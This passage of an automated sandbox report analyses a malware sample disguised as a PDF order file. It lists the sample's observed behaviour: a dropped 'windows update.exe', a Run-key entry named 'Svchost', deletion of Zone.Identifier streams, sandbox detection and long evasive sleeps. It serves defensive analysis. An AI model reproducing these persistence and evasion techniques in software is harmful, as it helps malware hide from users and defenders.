                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.68c0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.40d6ed0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2252532940.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_04895F00 push 28B8247Fh; ret 0_2_04895F06
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072C3DC3 push edx; ret 0_2_072C3DC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\SubDir\windows update.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\SubDir\windows update.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 4880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 72E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 6AA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1800000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: 47A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeWindow / User API: threadDelayed 2459Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeWindow / User API: threadDelayed 7335Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 528Thread sleep count: 2459 > 30Jump to behavior
